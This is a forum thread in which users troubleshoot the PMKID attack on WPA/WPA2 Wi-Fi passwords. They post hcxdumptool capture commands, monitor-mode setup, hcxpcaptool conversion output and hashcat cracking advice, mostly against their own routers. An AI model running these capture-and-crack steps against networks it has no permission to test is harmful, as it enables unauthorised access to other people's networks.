New attack on WPA/WPA2 using PMKID
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,

I've tried doing this and when I enter

hcxdumptool -o test.pcapng -i wlan0 --enable_status=3

I get

interface is not up
failed to init socket

Can anyone help me with this error please?
I'm using a ALFAAWUS036ACH, up and in monitor mode and I'm on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali)).
I used:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to get it into monitor mode.
Any help is greatly appreciated.
If more information is needed I'll post again
Thanks in advance!


Before monitor mode:

Code:
systemctl stop wpa_supplicant.service

systemctl stop network-manager.service


Than

Code:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,

I've tried doing this and when I enter

hcxdumptool -o test.pcapng -i wlan0 --enable_status=3

I get

interface is not up
failed to init socket

Can anyone help me with this error please?
I'm using a ALFAAWUS036ACH, up and in monitor mode and I'm on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali)).
I used:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to get it into monitor mode.
Any help is greatly appreciated.
If more information is needed I'll post again
Thanks in advance!

Update: Thanks that helped, I'm also running it with a filterlist of 1 MAC address right now if that matters.
So I got it to run but it only says "PROBEREQUEST" and "PROBERESPONSE" (never "AUTHENTICATION" or "ASSOCIATIONREQUEST") and of course never "FOUND PMKID"
Do you know what this could mean?
I tried it on 3 AP's so far, should i try more?
Thank you again, I'm really grateful.
I got the PMKID now. Thanks again.
It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.
Hey super exciting post.. but i just tested this against three APs to which i know the password. I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if i am missing something.. I wait of course until HCXDUMPTOOL yields a PMKID FOUND! running a command like so:

`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng `

(which takes a while! I'd almost rather do a de-auth / capture 4way attack)

where homewifi.txt has my routers mac address minus the ":"

I then ran:
`hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng

summary:
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1
'

anything im missing? or does it just not work? maybe im late to the game and its already patched on all three routers? doubt that.
If there is an algorithm for the hand shake, and another for the PMKID, and the common denominator is the password, can't the handshake and tthe PMKID used to reveal the PW ?
(10-27-2018, 05:04 PM)elidell Wrote: Hey super exciting post..  but i just tested this against three APs to which i know the password.  I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries.  I am with @Rit here.. doesn't seem to work..  I don't know if i am missing something..  I wait of course until HCXDUMPTOOL yields a PMKID FOUND!  running a command like so:

`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng `

(which takes a while!  I'd almost rather do a de-auth / capture 4way attack)

where homewifi.txt has my routers mac address minus the ":"

I then ran:
`hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng
                                               
summary:                                        
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1
'

anything im missing?  or does it just not work?  maybe im late to the game and its already patched on all three routers?  doubt that.
Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.
(10-27-2018, 06:20 PM)Rit Wrote: If there is an algorithm for the hand shake, and another for the PMKID, and the common denominator is the password, can't the handshake and tthe PMKID used to reveal the PW ?

Both are usable to be decrypted with hashcat. Whether you are obtaining a handshake VIA a de-auth of a client to create a hccapx attack or capturing a PMKID clientless they both yeild the same result just in different formats.

@elidell - Rit is correct in that you have created the proper hash to be ran with hashcat. Now you need to create your attack and load your hash to find the password.
(10-23-2018, 11:07 PM)Rit Wrote: It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.

(10-27-2018, 06:31 PM)Rit Wrote: Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.

LOL, no i just didn't post the hashcat results.  I assure you i put it through hashcat. i made a simple world list that had 4 passwords including the one used by clownhouse "Password123"  Turns out though i didn't actually spell it correct in my dummy word list.